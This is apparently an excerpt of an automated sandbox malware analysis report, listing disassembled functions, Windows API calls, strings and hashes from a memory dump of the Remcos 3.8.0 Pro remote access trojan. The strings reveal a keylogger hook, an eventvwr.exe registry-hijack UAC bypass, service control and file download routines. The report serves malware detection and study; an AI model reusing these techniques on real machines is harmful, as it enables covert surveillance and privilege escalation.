                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                      • WSAGetLastError.WS2_32 ref: 00404A01
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                      • API String ID: 994465650-2151626615
                                      • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                      • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                      • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                      • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 65535$udp
                                      • API String ID: 0-1267037602
                                      • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                      • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                      • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                      • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                      APIs
                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                      • API String ID: 82841172-425784914
                                      • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                                      • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                      • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                                      • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                      • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                      • __dosmaperr.LIBCMT ref: 00438646
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                      • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                      • __dosmaperr.LIBCMT ref: 00438683
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                      • __dosmaperr.LIBCMT ref: 004386D7
                                      • _free.LIBCMT ref: 004386E3
                                      • _free.LIBCMT ref: 004386EA
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                      • String ID:
                                      • API String ID: 2441525078-0
                                      • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                      • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                      • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                      • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0$1$2$3$4$5$6$7
                                      • API String ID: 0-3177665633
                                      • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                      • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                      • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                      • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 0040549F
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                      • TranslateMessage.USER32(?), ref: 0040555E
                                      • DispatchMessageA.USER32(?), ref: 00405569
                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                      • API String ID: 2956720200-749203953
                                      • Opcode ID: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
                                      • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                      • Opcode Fuzzy Hash: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
                                      • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                      APIs
                                        • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                      • CloseHandle.KERNEL32(00000000), ref: 00416123
                                      • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                      • String ID: <$@$@%G$@%G$Temp
                                      • API String ID: 1704390241-4139030828
                                      • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                      • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                      • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                      • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                      • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                      • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                      • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                      APIs
                                      • _free.LIBCMT ref: 00445645
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 00445651
                                      • _free.LIBCMT ref: 0044565C
                                      • _free.LIBCMT ref: 00445667
                                      • _free.LIBCMT ref: 00445672
                                      • _free.LIBCMT ref: 0044567D
                                      • _free.LIBCMT ref: 00445688
                                      • _free.LIBCMT ref: 00445693
                                      • _free.LIBCMT ref: 0044569E
                                      • _free.LIBCMT ref: 004456AC
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                      • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                      • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                      • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                      APIs
                                      • Sleep.KERNEL32(00001388), ref: 00409738
                                        • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                        • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                        • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                        • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                        • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                      • String ID: H"G$H"G
                                      • API String ID: 3795512280-1424798214
                                      • Opcode ID: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
                                      • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                      • Opcode Fuzzy Hash: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
                                      • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                                      APIs
                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                      • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                      • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                      • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                        • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                      • Sleep.KERNEL32(00000064), ref: 00415A46
                                      • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreateDeleteExecuteShellSleep
                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                      • API String ID: 1462127192-2001430897
                                      • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                      • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                      • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                      • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                      • ExitProcess.KERNEL32 ref: 00406782
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteExitProcessShell
                                      • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                      • API String ID: 1124553745-1488154373
                                      • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                      • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                      • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                      • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                      APIs
                                      • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                      • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocConsoleShowWindow
                                      • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                      • API String ID: 4118500197-4025029772
                                      • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                      • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                      • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                      • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                        • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                        • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                        • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                      • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                      • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                      • TranslateMessage.USER32(?), ref: 0041B29E
                                      • DispatchMessageA.USER32(?), ref: 0041B2A8
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                      • String ID: Remcos
                                      • API String ID: 1970332568-165870891
                                      • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                      • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                      • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                      • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                      • _memcmp.LIBVCRUNTIME ref: 00442935
                                      • _free.LIBCMT ref: 004429A6
                                      • _free.LIBCMT ref: 004429BF
                                      • _free.LIBCMT ref: 004429F1
                                      • _free.LIBCMT ref: 004429FA
                                      • _free.LIBCMT ref: 00442A06
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast$_abort_memcmp
                                      • String ID: C
                                      • API String ID: 1679612858-1037565863
                                      • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                      • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                      • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                      • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: tcp$udp
                                      • API String ID: 0-3725065008
                                      • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                      • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                      • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                      • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                      APIs
                                        • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                      • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                      • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                      • SetLastError.KERNEL32(0000000E), ref: 0041082E
                                        • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                                      • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                                      • SetLastError.KERNEL32(0000045A), ref: 0041098F
                                        • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                                        • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                      • String ID: $.F
                                      • API String ID: 3950776272-1421728423
                                      • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                      • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                      • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                      • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                        • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                                        • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                      • String ID: .part
                                      • API String ID: 1303771098-3499674018
                                      • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                      • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                      • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                      • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                      • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                      • GetLastError.KERNEL32 ref: 00409375
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                      • TranslateMessage.USER32(?), ref: 004093D2
                                      • DispatchMessageA.USER32(?), ref: 004093DD
                                      Strings
                                      • Keylogger initialization failure: error , xrefs: 00409389
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                      • String ID: Keylogger initialization failure: error
                                      • API String ID: 3219506041-952744263
                                      • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                      • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                      • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                      • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputSend
                                      • String ID:
